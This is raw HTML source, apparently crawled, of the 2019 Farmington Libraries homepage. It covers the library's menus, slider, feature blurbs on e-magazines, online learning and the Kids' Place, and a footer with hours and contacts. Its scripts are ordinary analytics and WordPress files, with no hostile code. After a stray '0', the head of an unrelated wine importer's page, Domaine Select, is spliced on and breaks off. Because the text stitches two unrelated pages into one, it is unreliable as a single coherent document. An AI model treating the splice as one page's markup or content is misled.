src='http://farmingtonlibraries.org/wp-content/themes/new-bizwaytheme/js/jquery.validate.js?ver=5.1.1'></script> <script type='text/javascript' src='http://farmingtonlibraries.org/wp-content/themes/new-bizwaytheme/js/custom.js?ver=5.1.1'></script> <script type='text/javascript' src='http://farmingtonlibraries.org/wp-content/plugins/slideshow-gallery/views/default/js/gallery.js?ver=1.0'></script> <script type='text/javascript' src='http://farmingtonlibraries.org/wp-content/plugins/slideshow-gallery/views/default/js/colorbox.js?ver=1.6.3'></script> <script type='text/javascript' src='http://farmingtonlibraries.org/wp-content/plugins/slideshow-gallery/views/default/js/jquery-ui.js?ver=5.1.1'></script> <link rel='https://api.w.org/' href='http://farmingtonlibraries.org/wp-json/' /> <link rel="EditURI" type="application/rsd+xml" title="RSD" href="http://farmingtonlibraries.org/xmlrpc.php?rsd" /> <link rel="wlwmanifest" type="application/wlwmanifest+xml" href="http://farmingtonlibraries.org/wp-includes/wlwmanifest.xml" /> <meta name="generator" content="WordPress 5.1.1" /> <script type='text/javascript' data-cfasync='false'>var _mmunch = {'front': false, 'page': false, 'post': false, 'category': false, 'author': false, 'search': false, 'attachment': false, 'tag': false};_mmunch['front'] = true;</script><script data-cfasync="false" src="//a.mailmunch.co/app/v1/site.js" id="mailmunch-script" data-plugin="cc_mm" data-mailmunch-site-id="442338" async></script><!--[if gte IE 9]> <script type="text/javascript"> Cufon.set('engine', 'canvas'); </script> <![endif]--><link rel="shortcut icon" href="http://farmingtonlibraries.org/wp-content/uploads/2017/07/Logo2017SUPAHSMALL.png"/> <script> (function(i,s,o,g,r,a,m){i['GoogleAnalyticsObject']=r;i[r]=i[r]||function(){ (i[r].q=i[r].q||[]).push(arguments)},i[r].l=1*new Date();a=s.createElement(o), m=s.getElementsByTagName(o)[0];a.async=1;a.src=g;m.parentNode.insertBefore(a,m) })(window,document,'script','//www.google-analytics.com/analytics.js','ga'); ga('create', 'UA-3242535-3', 'auto'); ga('send', 'pageview'); </script> </head> <body class="home blog" id="regal_body" style=""> <div class="header-container"> <div class="container_24"> <div class="grid_24"> <div class="header"> <!--Start Logo--> <div class="logo"> <a href="http://farmingtonlibraries.org/"><img src="http://farmingtonlibraries.org/wp-content/uploads/2017/07/WEBSITE-Header-2017.png" alt="The Farmington Libraries" /></a></div> <!--End Logo--> </div> </div> <div class="clear"></div> </div> </div> <div class="menu-container"> <div class="container_24"> <div class="grid_24"> <div class="grid_sub_24 sub_alpha"> <!--Start Menu_Wrapper--> <div class="menu_wrapper"> <div id="MainNav"> <a href="#" class="mobile_nav closed">Navigation Menu<span></span></a> <div id="menu" class="menu-main-nav-container"><ul id="menu-main-nav" class="ddsmoothmenu"><li id="menu-item-805" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-805"><a href="http://dev.farmingtonlibraries.org/">Home</a></li> <li id="menu-item-7" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-7"><a href="http://farmingtonlibraries.org/about-us/">About Us</a> <ul class="sub-menu"> <li id="menu-item-1682" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-1682"><a href="http://catalog.farmingtonlibraries.org/">Library Catalog</a></li> <li id="menu-item-629" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-629"><a href="http://farmingtonlibraries.org/hours-directions/">Hours &#038; Directions</a> <ul class="sub-menu"> <li id="menu-item-758" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-758"><a href="http://farmingtonlibraries.org/hours-directions/closed-dates/">2019 Closings</a></li> </ul> </li> <li id="menu-item-1551" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-1551"><a href="http://farmingtonlibraries.org/about-us/">Mission &#038; Vision</a> <ul class="sub-menu"> <li id="menu-item-749" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-749"><a href="http://farmingtonlibraries.org/history-of-the-libraries/">History of the Farmington Libraries</a></li> </ul> </li> <li id="menu-item-42" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-42"><a href="http://farmingtonlibraries.org/team/">Meet Our Team</a></li> <li id="menu-item-40" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-40"><a href="http://farmingtonlibraries.org/fvgla/">FVGLA</a> <ul class="sub-menu"> <li id="menu-item-409" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-409"><a href="http://farmingtonlibraries.org/fvgla/endowment-campaign/">Endowment Campaign</a></li> </ul> </li> <li id="menu-item-41" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-41"><a href="http://farmingtonlibraries.org/library-board/">Library Board</a></li> <li id="menu-item-63" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-63"><a href="http://farmingtonlibraries.org/friends/">Friends of the Farmington Libraries</a> <ul class="sub-menu"> <li id="menu-item-162" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-162"><a href="http://farmingtonlibraries.org/friends/history-of-the-friends/">History of the Friends</a></li> </ul> </li> <li id="menu-item-383" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-383"><a href="http://farmingtonlibraries.org/support-the-library/">Support the Libraries</a></li> <li id="menu-item-736" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-736"><a href="http://farmingtonlibraries.org/about-us/employment-opportunities/">Employment Opportunities</a></li> </ul> </li> <li id="menu-item-93" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-93"><a href="http://farmingtonlibraries.org/library-services/">Services</a> <ul class="sub-menu"> <li id="menu-item-28" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-28"><a href="http://farmingtonlibraries.org/adult-services/">Adults</a> <ul class="sub-menu"> <li id="menu-item-2656" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-2656"><a href="https://farmingtonlibraries.librarymarket.com/reserve-room">Reserve a Room</a></li> <li id="menu-item-4150" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-4150"><a href="http://farmingtonlibraries.org/business-center/">Business Center</a></li> <li id="menu-item-5765" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-5765"><a href="http://farmingtonlibraries.org/health-resources/">Health Resources</a></li> <li id="menu-item-5480" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-5480"><a href="https://docs.google.com/forms/d/e/1FAIpQLSf9Gdp_Y-8eqPOO-DQqnoQJuiS8JWOq0wh5XYA3iQXTBl7vmQ/viewform?usp=sf_link">Electronic Devices Borrower&#8217;s Agreement</a></li> </ul> </li> <li id="menu-item-795" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-795"><a href="http://farmingtonlibraries.org/teen-services/">Teens</a> <ul class="sub-menu"> <li id="menu-item-796" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-796"><a href="http://farmingtonlibraries.org/teen-services/teen-resources-links/">Teen Resources &#038; Links</a></li> </ul> </li> <li id="menu-item-786" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-786"><a href="http://farmingtonlibraries.org/childrens-department/">Kids&#8217; Place</a> <ul class="sub-menu"> <li id="menu-item-6270" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-6270"><a href="http://farmingtonlibraries.org/kids-summer-reading-2019/">Kids&#8217; Summer Reading</a></li> <li id="menu-item-787" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-787"><a href="http://farmingtonlibraries.org/kids-resources/">Kids&#8217; Resources</a></li> </ul> </li> <li id="menu-item-784" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-784"><a href="http://farmingtonlibraries.org/barney-branch/">Barney Library</a></li> <li id="menu-item-789" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-789"><a href="http://farmingtonlibraries.org/lending-services/">Lending Services</a></li> <li id="menu-item-790" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-790"><a href="http://farmingtonlibraries.org/local-history-genealogy/">Local History &#038; Genealogy</a> <ul class="sub-menu"> <li id="menu-item-5619" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-5619"><a href="http://farmingtonlibraries.org/farmingtonspeaks/">Farmington Speaks</a></li> <li id="menu-item-5357" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-5357"><a href="https://library.biblioboard.com/curation/f3300e2c-dcf0-41bb-a30f-4309236c8c3e">Digital Archive</a></li> <li id="menu-item-785" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-785"><a href="http://farmingtonlibraries.org/farmington-homes/">Farmington Homes</a></li> <li id="menu-item-791" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-791"><a href="http://farmingtonlibraries.org/local-history-genealogy/farmington-library-oral-history-project/">Farmington Library Oral History Project</a></li> <li id="menu-item-792" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-792"><a href="http://farmingtonlibraries.org/local-history-genealogy/farmington-room-collections/">Farmington Room Collections</a></li> <li id="menu-item-797" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-797"><a href="http://farmingtonlibraries.org/history-of-farmington/">History of Farmington</a></li> </ul> </li> <li id="menu-item-3686" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-3686"><a href="http://farmingtonlibraries.org/the-maker-space/">Maker Space &#038; The Studio</a> <ul class="sub-menu"> <li id="menu-item-7047" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-7047"><a href="https://docs.google.com/forms/d/e/1FAIpQLSchIdxshlLY8Hk3Em8uq7gGCpOVe2wklRKwJByf3EsASGtzzw/viewform?usp=sf_link">Get Trained</a></li> <li id="menu-item-7044" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-7044"><a href="https://farmingtonlibraries.librarymarket.com/reserve-room/room?room_type=87&#038;library_branch=&#038;op=Apply&#038;form_id=lc_reserve_by_time">Reserve Equipment</a></li> </ul> </li> <li id="menu-item-793" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-793"><a href="http://farmingtonlibraries.org/museum-passes/">Museum Passes</a> <ul class="sub-menu"> <li id="menu-item-4166" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-4166"><a href="http://www.eventkeeper.com/code/events.cfm?curOrg=FRMNGTNPL&#038;curApp=passes">Reserve a Museum Pass</a></li> </ul> </li> <li id="menu-item-3221" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-3221"><a href="http://farmingtonlibraries.org/computer-u/">One-on-One Technology Help</a></li> <li id="menu-item-788" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-788"><a href="http://farmingtonlibraries.org/learning-center/">Online Resources</a> <ul class="sub-menu"> <li id="menu-item-1240" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-1240"><a href="http://farmingtonlibraries.org/health-resources/">Health Resources</a></li> </ul> </li> <li id="menu-item-794" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-794"><a href="http://farmingtonlibraries.org/passports/">Passport Services</a></li> </ul> </li> <li id="menu-item-965" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-965"><a href="http://farmingtonlibraries.org/library-news/">News</a> <ul class="sub-menu"> <li id="menu-item-1424" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-1424"><a href="http://farmingtonlibraries.org/library-news/">Blog</a></li> <li id="menu-item-1425" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-1425"><a href="https://www.facebook.com/farmingtonlibraries">Facebook</a></li> <li id="menu-item-1426" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-1426"><a href="https://twitter.com/FarmlibCT">Twitter</a></li> <li id="menu-item-1423" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-1423"><a href="https://www.youtube.com/user/librarianemily/videos">YouTube</a></li> </ul> </li> <li id="menu-item-777" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-777"><a href="https://farmingtonlibraries.librarymarket.com/?&#038;event_type%5Blc_closing%5D=lc_closing&#038;event_type%5Blc_event%5D=lc_event&#038;form_id=lc_calendar_upcoming_form">Programs &#038; Events</a> <ul class="sub-menu"> <li id="menu-item-1556" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-1556"><a href="https://farmingtonlibraries.librarymarket.com/?&#038;event_type%5Blc_closing%5D=lc_closing&#038;event_type%5Blc_event%5D=lc_event&#038;form_id=lc_calendar_upcoming_form">All Programs &#038; Events</a></li> <li id="menu-item-778" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-778"><a href="https://farmingtonlibraries.librarymarket.com/?&#038;age_group%5B46%5D=46&#038;form_id=lc_calendar_upcoming_form">Adults</a> <ul class="sub-menu"> <li id="menu-item-4518" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-4518"><a href="http://farmingtonlibraries.org/category/adultprograms/bus/">Bus Trips</a></li> <li id="menu-item-295" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-295"><a href="http://farmingtonlibraries.org/book-groups/">Book Groups</a></li> <li id="menu-item-2813" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2813"><a href="http://farmingtonlibraries.org/art-exhibits/">Art Shows and Gallery Spaces</a></li> </ul> </li> <li id="menu-item-782" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-782"><a href="https://farmingtonlibraries.librarymarket.com/?&#038;age_group%5B45%5D=45&#038;form_id=lc_calendar_upcoming_form">Teens</a></li> <li id="menu-item-781" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-781"><a href="https://farmingtonlibraries.librarymarket.com/?&#038;age_group%5B44%5D=44&#038;form_id=lc_calendar_upcoming_form">Kids</a></li> <li id="menu-item-1091" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-1091"><a href="https://farmingtonlibraries.librarymarket.com/?&#038;event_type%5Blc_closing%5D=lc_closing&#038;event_type%5Blc_event%5D=lc_event&#038;library_branch%5B91%5D=91&#038;form_id=lc_calendar_upcoming_form">Barney Library</a></li> <li id="menu-item-780" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-780"><a href="https://farmingtonlibraries.librarymarket.com/?&#038;program_type%5B170%5D=170&#038;form_id=lc_calendar_upcoming_form">Bijou Films</a></li> <li id="menu-item-6421" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-6421"><a href="https://farmingtonlibraries.librarymarket.com/?&#038;program_type%5B176%5D=176&#038;form_id=lc_calendar_upcoming_form">Maker Space &#038; The Studio</a></li> <li id="menu-item-7043" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-7043"><a href="https://farmingtonlibraries.librarymarket.com/?&#038;event_type%5Blc_reservation%5D=lc_reservation&#038;form_id=lc_calendar_upcoming_form">Non-Library Events</a></li> <li id="menu-item-6669" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-6669"><a href="http://farmingtonlibraries.org/community-events/">Community Events</a></li> </ul> </li> <li id="menu-item-6945" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-6945"><a href="http://farmingtonlibraries.org/adult-services/">Books &#038; Media</a> <ul class="sub-menu"> <li id="menu-item-6937" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-6937"><a href="http://farmingtonlibraries.org/e-books/">E-Books &#038; E-Audiobooks</a></li> <li id="menu-item-5475" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-5475"><a href="https://www.rbdigital.com/50emagazine/service/magazines">E-Magazines</a></li> <li id="menu-item-6936" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-6936"><a href="http://farmingtonlibraries.org/novelist-plus/">Discover Your Next Read</a></li> <li id="menu-item-1205" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-1205"><a href="https://www.rbdigital.com/farmingtonct/indieflix">Online Streaming</a></li> <li id="menu-item-807" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-807"><a href="http://www.supportlibrary.com/nt/landing.cfm?x=909&#038;menu=bccarousel&#038;submenu=bcsignup">Online Book Clubs</a></li> </ul> </li> <li id="menu-item-801" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-801"><a href="http://catalog.farmingtonlibraries.org/cgi-bin/koha/opac-user.pl">My Account</a></li> <li id="menu-item-800" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-has-children menu-item-800"><a href="http://catalog.farmingtonlibraries.org/">Library Catalog</a> <ul class="sub-menu"> <li id="menu-item-1554" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-1554"><a href="http://catalog.farmingtonlibraries.org/">Library Catalog</a></li> <li id="menu-item-2289" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-2289"><a href="http://farmingtonlibraries.org/how-to-use-the-catalog/">How to Use Our Catalog</a></li> <li id="menu-item-7037" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-7037"><a href="https://libraryconnection.overdrive.com/lci-farmington/content">Overdrive</a></li> <li id="menu-item-7038" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-7038"><a href="https://www.hoopladigital.com/my/hoopla">Hoopla</a></li> <li id="menu-item-6949" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-6949"><a href="https://www.rbdigital.com/50emagazine/service/magazines">E-Magazines</a></li> </ul> </li> </ul></div> </div> </div> <!--End Menu Wrapper--> </div> <!--<div class="grid_sub_5 sub_omega"> --> <!-- <div class="top-search"> --> <!-- </div> --> <!-- </div> --> </div> <div class="clear"></div> </div> </div> <!--Start Slider Wrapper--> <div class="slider-wrapper-container"> <input type="hidden" id="txt_slidespeed" value=" 7000 "/> <div class="container_24"> <div class="grid_24"> <div class="slider-wrapper"> <h1>Service. Experiences. Resources.</h1> <h2>There's Always Something New at the Libraries!</h2> <div class="flexslider"> <ul class="slides"> <li> <a href="http://farmingtonlibraries.org/wp-content/uploads/2019/05/May-2019-Childrens-Programs-1.pdf"><img src="http://farmingtonlibraries.org/wp-content/uploads/2019/05/MayProgramsSlider.png" alt="Slider Image 1"/></a> </li> <li><a href=""><img src="http://farmingtonlibraries.org/wp-content/uploads/2019/05/weneedvolunteers1.png" alt="Slider Image 2"/></a></li> <li><a href="http://www.rbdigital.com/farmingtonct/service/transparent_language"><img src="http://farmingtonlibraries.org/wp-content/uploads/2019/05/goingsome-where_1.png" alt="Slider Image 3"/></a></li> <li><a href="https://www.creativebug.com/lib/farmingtonlibraries"><img src="http://farmingtonlibraries.org/wp-content/uploads/2019/02/Creativebugslider.png" alt="Slider Image 4"/></a></li> <li><a href="https://www.hoopladigital.com/"><img src="http://farmingtonlibraries.org/wp-content/uploads/2018/05/HooplaSlider.png" alt="Slider Image 5"/></a></li> <li><a href="https://indieauthorproject.librariesshare.com/connecticut/"><img src="http://farmingtonlibraries.org/wp-content/uploads/2019/03/IndieAuthorContestSlider.png" alt="Slider Image 6"/></a></li> <li><a href="https://smile.amazon.com/"><img src="http://farmingtonlibraries.org/wp-content/uploads/2018/11/AmazonSmile.png" alt="Slider Image 7"/></a></li> </ul> </div> <div class="slider-shaddow"></div> </div> </div> <div class="clear"></div> </div> </div> <!--End Body Wrapper--> <!--Start main Wrapper--> <div class="main-content-container"> <div class="container_24"> <div class="grid_24"> <div class="main-content"> <div class="grid_sub_8 sub_alpha"> <div class="page-item first-item view view-ninth"> <a href="https://www.rbdigital.com/50emagazine/service/magazines"><h1>E-Magazines Are Here!</h1></a> <a href="https://www.rbdigital.com/50emagazine/service/magazines"><img class="effect" src="http://farmingtonlibraries.org/wp-content/uploads/2017/08/emagazinesfallfeature.png" alt="Feature Image 1"/></a> <div class="mask mask-1"></div> <div class="mask mask-2"></div> <p>RBdigital Magazines, the world’s largest newsstand, offers full-color digital magazines for anytime, anywhere reading on desktops, mobile devices, and apps. The magazine collection includes both new and backlist titles with no holds, no checkout periods, and no limits.</p> </div> </div> <div class="grid_sub_8 sub_middle"> <div class="page-item item-two view view-ninth"> <a href=" http://dev.farmingtonlibraries.org/learning-center"><h1>Online Learning</h1></a> <a href=" http://dev.farmingtonlibraries.org/learning-center"><img class="effect" src="http://farmingtonlibraries.org/wp-content/uploads/2015/06/homepage-secondfeaturearea-eresources.jpg" alt="Feature Image 2"/></a> <p>Free access to resources for language learning, job searching, genealogy research and much more! Many of the resources are available to download from your device's app store. </p> </div> </div> <div class="grid_sub_8 sub_omega"> <div class="page-item last-item view view-ninth"> <a href="http://dev.farmingtonlibraries.org/childrens-department"><h1>The Kids' Place</h1></a> <a href="http://dev.farmingtonlibraries.org/childrens-department"><img class="effect" src="http://dev.farmingtonlibraries.org/wp-content/uploads/2012/12/kidsplacefeaturesmall2.jpg" alt="Feature Image 3"/></a> <p>Check out the Kids' Place, where we have programs, services, and collections for children and families. Explore our events flyer for complete program information, and be sure to visit us at the library for activities and to browse our collections.</p> </div> </div> </div> </div> <div class="clear"></div> </div> </div> <!--End main Wrapper--> <!--Start Footer Wrapper--> <div class="footer-wrapper"> <!--Start Wrapper--> <div class="container_24"> <div class="grid_24"> <div class="footer-top"> <div class="grid_sub_8 sub_alpha"> <div class="footer-top-inner1"> <span><b>Social Links</b></span> <ul class="tt-wrapper"> <li><a class="fb" href="https://www.facebook.com/farmingtonlibraries"><span>Facebook</span></a></li> <li><a class="yt" href="https://www.youtube.com/user/librarianemily"><span>You Tube</span></a></li> </ul> </div> </div> <div class="grid_sub_8 sub_middle"> <div class="footer-top-inner2"> E: [email protected] </div> </div> <div class="grid_sub_8 sub_omega"> <div class="footer-top-inner3"> P: 860-673-6791 </div> </div> </div> <div class="clear"></div> <div class="footer"> <div class="grid_sub_6 sub_alpha"> <div class="footer_widget"> <h6>Library Hours</h6> <div class="textwidget"><p>MAIN LIBRARY<br /> <strong>Mon-Thurs</strong>  9 AM &#8211; 9 PM<br /> <strong>Friday &amp; Saturday </strong> 9 AM &#8211; 5 PM<br /> <strong>Summer Saturdays</strong>  9 AM &#8211; 1 PM<br /> <strong>Sunday (Jan-March) </strong> 1 PM &#8211; 4 PM</p> <p>BARNEY LIBRARY<br /> <strong>Mon-Thurs</strong>  9 AM &#8211; 5 PM<br /> <strong>Friday</strong>  CLOSED<br /> <strong>Saturday</strong>  9 AM &#8211; 5 PM<br /> <strong>Summer Saturdays</strong>  9 AM &#8211; 1 PM</p> </div> </div> </div> <div class="grid_sub_6 sub_middle"> <div class="footer_widget"> <h6>Contact Us</h6><div class="menu-contact-us-container"><ul id="menu-contact-us" class="menu"><li id="menu-item-370" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-370"><a href="mailto:[email protected]">Library Director, Laura Horn</a></li> <li id="menu-item-371" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-371"><a href="mailto:[email protected]">Children&#8217;s Department</a></li> <li id="menu-item-372" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-372"><a href="mailto:[email protected]">Information Services Department</a></li> <li id="menu-item-967" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-967"><a href="mailto:[email protected]">Webmaster</a></li> </ul></div> </div> </div> <div class="grid_sub_6 sub_middle"> <div class="footer_widget "> <h6>Support the Libraries</h6><div class="menu-support-the-libraries-container"><ul id="menu-support-the-libraries" class="menu"><li id="menu-item-412" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-412"><a href="http://dev.farmingtonlibraries.org/fvgla/endowment-campaign">Donate to the Endowment Campaign</a></li> <li id="menu-item-2948" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-2948"><a href="https://smile.amazon.com/">Sign Up for Amazon Smile</a></li> <li id="menu-item-384" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-384"><a href="http://dev.farmingtonlibraries.org/the-friends-of-the-farmington-libraries">Join the Friends</a></li> <li id="menu-item-385" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-385"><a href="http://dev.farmingtonlibraries.org/support-the-library">Other Ways You Can Help</a></li> </ul></div> </div> </div> <div class="grid_sub_6 sub_omega"> <div class="footer_widget last"> <h6>Helpful Links</h6><div class="menu-helpful-links-container"><ul id="menu-helpful-links" class="menu"><li id="menu-item-659" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-659"><a href="http://farmingtonlibraries.org/sitemap-2/">Site Index</a></li> <li id="menu-item-386" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-386"><a href="http://www.farmington-ct.org/">Town of Farmington</a></li> <li id="menu-item-387" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-387"><a href="http://www.fpsct.org/schools/farmington-continuing-education">Continuing Education</a></li> <li id="menu-item-388" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-388"><a href="http://www.fpsct.org/">Farmington Public Schools</a></li> </ul></div> </div> </div> </div> </div> <div class="clear"></div> </div> </div> <!--End Wrapper--> <!--End Footer Wrapper--> <!--Start Footer Bottom--> <div class="footer_bottom"> <!--Start Wrapper--> <div class="wrapper"> <div class="container_24"> <div class="grid_24"> <div class="footer_bottom_content"> <p class="copyright">Farmington Libraries, 2019</p> </div> </div> </div> </div> <!--End Wrapper--> </div> <!--End Footer Bottom--> <script type='text/javascript' src='http://farmingtonlibraries.org/wp-content/themes/new-bizwaytheme/js/mobilemenu.js?ver=5.1.1'></script> <script type='text/javascript' src='http://farmingtonlibraries.org/wp-includes/js/wp-embed.min.js?ver=5.1.1'></script> </body> </html>
0
<!DOCTYPE html> <html lang="en-US" prefix="og: http://ogp.me/ns#" class="no-js"> <head> <meta property="og:image" content="http://domaineselect.com/wp-content/uploads/2015/09/arhiv2m-1200x400.jpg"/> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, minimum-scale=1, maximum-scale=1" /> <!-- <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no" /> --> <link rel="profile" href="http://gmpg.org/xfn/11"> <link rel="pingback" href="http://domaineselect.com/xmlrpc.php"> <link rel="shortcut icon" href="http://domaineselect.com/wp-content/uploads/2015/09/dsws.ico"> <link href='http://fonts.googleapis.com/css?family=Lato:300,400,700,900,300italic,400italic' rel='stylesheet' type='text/css'> <!--[if IE 9]> <script src="http://domaineselect.com/wp-content/themes/domaineselect/js/html5.js"></script> <![endif]--> <script>(function(html){html.className = html.className.replace(/\bno-js\b/,'js')})(document.documentElement);</script> <title>Domaine Select Wine &amp; Spirits</title> <!-- All in One SEO Pack 2.3.8 by Michael Torbert of Semper Fi Web Design[1057,1085] --> <meta name="description" itemprop="description" content="DSWS represent wines and specialized spirits from around the world of the highest quality and which express immense character, particular to their origin." /> <meta name="keywords" itemprop="keywords" content="Importer, wine, spirits, artisanal spirits, distributor, a+ pure wine, pure wine, wine industry, wholesaler, wine tastings, wine events, wine news, producers, wine producers, spirits producers, sake, shochu, chichibu, diplomatico rum, amaro lucano, domaine select, domaine select estates, ds merchants, dswe, champagne, cachaca, quality wine" /> <link rel="canonical" href="http://domaineselect.com/" /> <!-- /all in one seo pack --> <!-- This site is optimized with the Yoast SEO plugin v2.3.5 - https://yoast.com/wordpress/plugins/seo/ --> <link rel="canonical" href="http://domaineselect.com/" /> <meta property="og:locale" content="en_US" /> <meta property="og:type" content="website" /> <meta property="og:title" content="Home - Domaine Select" /> <meta property="og:url" content="http://domaineselect.com/" /> <meta property="og:site_name" content="Domaine Select" /> <script type='application/ld+json'>{"@context":"http:\/\/schema.org","@type":"WebSite","url":"http:\/\/domaineselect.com\/","name":"Domaine Select","potentialAction":{"@type":"SearchAction","target":"http:\/\/domaineselect.com\/?s={search_term_string}","query-input":"required name=search_term_string"}}</script> <script type='application/ld+json'>{"@context":"http:\/\/schema.org","@type":"Organization","url":"http:\/\/domaineselect.com\/","sameAs":[],"name":"Domaine Select Wine & Spirits","logo":"http:\/\/domaineselect.com\/wp-content\/uploads\/2015\/10\/DSWS_alta.jpg"}</script> <!-- / Yoast SEO plugin. --> <link rel="alternate" type="application/rss+xml" title="Domaine Select &raquo; Feed" href="http://domaineselect.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="Domaine Select &raquo; Comments Feed" href="http://domaineselect.com/comments/feed/" /> <link rel="alternate" type="application/rss+xml" title="Domaine Select &raquo; Home Comments Feed" href="http://domaineselect.com/home/feed/" /> <script type="text/javascript"> window._wpemojiSettings = {"baseUrl":"http:\/\/s.w.org\/images\/core\/emoji\/72x72\/","ext":".png","source":{"concatemoji":"http:\/\/domaineselect.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=4.2.2"}}; !function(a,b,c){function d(a){var c=b.createElement("canvas"),d=c.getContext&&c.getContext("2d");return d&&d.fillText?(d.textBaseline="top",d.font="600 32px Arial","flag"===a?(d.fillText(String.fromCharCode(55356,56812,55356,56807),0,0),c.toDataURL().length>3e3):(d.fillText(String.fromCharCode(55357,56835),0,0),0!==d.getImageData(16,16,1,1).data[0])):!1}function e(a){var c=b.createElement("script");c.src=a,c.type="text/javascript",b.getElementsByTagName("head")[0].appendChild(c)}var f,g;c.supports={simple:d("simple"),flag:d("flag")},c.DOMReady=!1,c.readyCallback=function(){c.DOMReady=!0},c.supports.simple&&c.supports.flag||(g=function(){c.readyCallback()},b.addEventListener?(b.addEventListener("DOMContentLoaded",g,!1),a.addEventListener("load",g,!1)):(a.attachEvent("onload",g),b.attachEvent("onreadystatechange",function(){"complete"===b.readyState&&c.readyCallback()})),f=c.source||{},f.concatemoji?e(f.concatemoji):f.wpemoji&&f.twemoji&&(e(f.twemoji),e(f.wpemoji)))}(window,document,window._wpemojiSettings); </script> <style type="text/css"> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 .07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <!--[if lt IE 9]><link href="style.css" rel="stylesheet" type="text/css"><![endif]--><link rel='stylesheet' id='jquery-ui-css-css' href='//ajax.googleapis.com/ajax/libs/jqueryui/1.11.2/themes/smoothness/jquery-ui.css?ver=4.2.2' type='text/css' media='all' /> <link rel='stylesheet' id='admin-styles-css' 